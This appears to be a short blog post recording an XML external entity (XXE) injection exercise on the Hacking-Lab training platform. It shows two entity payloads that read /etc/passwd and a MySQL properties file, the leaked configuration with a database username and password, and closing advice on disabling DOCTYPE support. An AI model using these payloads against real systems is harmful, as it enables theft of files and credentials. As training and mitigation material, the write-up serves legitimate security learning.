aD

May 30, 2014

Practicing XXE


***DISCLAIMER ALL MY WORK HERE IS DONE AT WWW.HACKING-LAB.COM*****




    XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage. External entities can reference files on the parser's filesystem; exploiting this feature may allow retrieval of arbitrary files, or denial of service by causing the server to read from a file such as /dev/random.

They can also reference URLs, exploiting this feature may allow port scanning from the XML parser's host, or the retrieval of sensitive web content which is otherwise inaccessible due to network topology and defenses.
   
    I performed this attack by testing the xml constructor by monitoring the connection to the search form using Zap. After submitting a test search, I monitored how it came out in Zap. I then proceeded to resend the packet with modified parameters.

The first injection I used to see if it was possible was the following
   
    < ?xml version="1.0" encoding="UTF-8" ? >
    < !DOCTYPE foo [
    < !ENTITY foo SYSTEM "file:///etc/passwd" >
    ] >
    < query >
            < result-limit >1&foo;< /result-limit >
            < bell-name >< /bell-name >
            < bell-description >< /bell-description >
    < /query >
   
    After which I tested to see if application was vulnerable to this type of attack, I began to try new folder locations looking for configurations files for the MYSQL database.  I started looking in the normal places /etc/my.cnf, root/.mycnf and so forth till I came across the properties page for the web application itself.
   
    I then proceeded to modified my injection parameters with this:
   
    < ?xml version="1.0" encoding="UTF-8" ? >
    < !DOCTYPE foo [
    < !ENTITY foo SYSTEM "file:///opt/applic/tomcat/webapps.properties/mysql.properties" >
    ] >
    < query>
            < result-limit >1&foo;< /result-limit >
            < bell-name >< /bell-name >
            < bell-description >< /bell-description >
    < /query >
   
    I inserted it back into ZAP and resent the packet and was returned the following.
   
    # MYSQL PROPERTIES - TIME IN SECONDS
################################################################
mysql.driver = org.gjt.mm.mysql.Driver

mysql.username = glockenemil
mysql.password = Nt88,.po

mysql.bells.url = jdbc:mysql://127.0.0.1:5506/glocken_emil?autoDeserialize=true
mysql.login.url = jdbc:mysql://127.0.0.1:5506/login
mysql.session.url = jdbc:mysql://127.0.0.1:5506/sessionservice

mysql.session.testquery =
mysql.login.testquery =
mysql.bells.testquery =

mysql.connections.max               = 100
mysql.connections.min               = 10
mysql.connections.increaserate      = 2
mysql.connections.timeout           = 120
mysql.connections.maxage            = 900

# LOGIN TABLE DEFS
#################################################################
mysql.tblLogin = users

mysql.fldAdditionalTime = additionaltime
mysql.fldReleaseTime = releasetime
mysql.fldUsername = username
mysql.fldTries = tries
contactForm = no
   
   
XML external entity injection makes use of the DOCTYPE tag to define the injected entity. XML parsers can usually be configured to disable support for this tag. You should consult the documentation for your XML parsing library to determine how to disable this feature. It may also be possible to use input validation to block input containing a DOCTYPE tag.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)